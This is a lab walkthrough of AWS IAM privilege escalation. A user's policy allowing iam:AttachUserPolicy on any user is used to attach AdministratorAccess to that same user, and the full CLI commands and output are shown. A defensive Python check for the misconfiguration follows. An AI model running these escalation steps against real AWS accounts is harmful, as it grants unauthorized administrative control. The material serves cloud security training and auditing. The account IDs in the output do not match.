Overly permissive permission I

An overly permissive permission can be abused by a user to perform privileged operations.

Objective: Leverage the policy attached to the student user and attain administrative privileges on the AWS account.


  1. Get access to AWS lab credentials.

  2. Configure AWS CLI.

  3. Check identity with:

aws sts get-caller-identity

  4. List the policies attached to the student user:

aws iam list-attached-user-policies --user-name student

  5. Check policy details for the Service policy:

aws iam get-policy --policy-arn arn:aws:iam::862839114976:policy/Service

  6. View policy details for the v1 version of the Service policy:

┌──(kali㉿kali)-[~]
└─$ aws iam get-policy-version --policy-arn arn:aws:iam::862839114976:policy/Service --version-id v1
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": "iam:AttachUserPolicy",
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::*:user/*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2023-05-11T09:02:39+00:00"
    }
}

  7. Try creating a new user named Bob:

┌──(kali㉿kali)-[~]
└─$ aws iam create-user --user-name Bob

An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::527058492733:user/student is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::527058492733:user/Bob because no identity-based policy allows the iam:CreateUser action

FAIL: the student user is not authorized to perform iam:CreateUser.

  8. Get the AdministratorAccess policy ARN:

┌──(kali㉿kali)-[~]
└─$ aws iam list-policies | grep 'AdministratorAccess'
            "PolicyName": "AdministratorAccess",
            "Arn": "arn:aws:iam::aws:policy/AdministratorAccess",
            "PolicyName": "AdministratorAccess-Amplify",
            "Arn": "arn:aws:iam::aws:policy/AdministratorAccess-Amplify",
            "PolicyName": "AWSAuditManagerAdministratorAccess",
            "Arn": "arn:aws:iam::aws:policy/AWSAuditManagerAdministratorAccess",
            "PolicyName": "AdministratorAccess-AWSElasticBeanstalk",
            "Arn": "arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk",

  9. Attach administrator policy to the current user:

┌──(kali㉿kali)-[~]
└─$ aws iam attach-user-policy --user-name student --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

  10. Check with:

┌──(kali㉿kali)-[~]
└─$ aws iam list-attached-user-policies --user-name student
{
    "AttachedPolicies": [
        {
            "PolicyName": "AdministratorAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
        },
        {
            "PolicyName": "IAMReadOnlyAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/IAMReadOnlyAccess"
        },
        {
            "PolicyName": "Service",
            "PolicyArn": "arn:aws:iam::862839114976:policy/Service"
        }
    ]
}

  11. Try creating a new user named Bob again:

┌──(kali㉿kali)-[~]
└─$ aws iam create-user --user-name Bob
{
    "User": {
        "Path": "/",
        "UserName": "Bob",
        "UserId": "AIDA4RZJYBTQHLY5KDFRX",
        "Arn": "arn:aws:iam::862839114976:user/Bob",
        "CreateDate": "2023-05-11T09:11:37+00:00"
    }
}

Successfully performed a privileged operation.
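
The root cause is the Service policy statement in step 6: iam:AttachUserPolicy is allowed on every user with no limit on which policy may be attached. The following audit check is an added example, not part of the original lab; it flags such statements in a policy document and shows a scoped form that passes. The function names, the placeholder account ID 111122223333 and the policy name ExamplePolicy are assumptions made for illustration.

```python
import fnmatch

RISKY_ACTION = "iam:attachuserpolicy"  # IAM action names are case-insensitive

def _as_list(value):
    """Action, Resource and Statement may each be a single item or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _restricts_policy_arn(condition):
    """True if any condition operator tests the iam:PolicyARN key."""
    return any(key.lower() == "iam:policyarn"
               for operands in (condition or {}).values()
               for key in operands)

def find_attach_policy_escalation(document):
    """Return indexes of Allow statements granting iam:AttachUserPolicy on
    wildcard resources with no limit on which policy may be attached.
    NotAction/NotResource are not evaluated in this narrowed example."""
    findings = []
    for index, stmt in enumerate(_as_list(document.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action"))]
        grants = any(fnmatch.fnmatchcase(RISKY_ACTION, a) for a in actions)
        broad = any("*" in r for r in _as_list(stmt.get("Resource")))
        if grants and broad and not _restricts_policy_arn(stmt.get("Condition")):
            findings.append(index)
    return findings

# The v1 document of the Service policy shown in this walkthrough.
LAB_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Action": "iam:AttachUserPolicy", "Effect": "Allow",
    "Resource": "arn:aws:iam::*:user/*"}]}

# Constructed corrected form: placeholder account ID and policy name.
SCOPED_POLICY = {"Version": "2012-10-17", "Statement": [{
    "Action": "iam:AttachUserPolicy", "Effect": "Allow",
    "Resource": "arn:aws:iam::111122223333:user/${aws:username}",
    "Condition": {"ArnEquals": {
        "iam:PolicyARN": "arn:aws:iam::111122223333:policy/ExamplePolicy"}}}]}

if __name__ == "__main__":
    print("lab policy findings:", find_attach_policy_escalation(LAB_POLICY))
    print("scoped policy findings:", find_attach_policy_escalation(SCOPED_POLICY))
```

The "Document" object returned by aws iam get-policy-version can be passed to find_attach_policy_escalation directly.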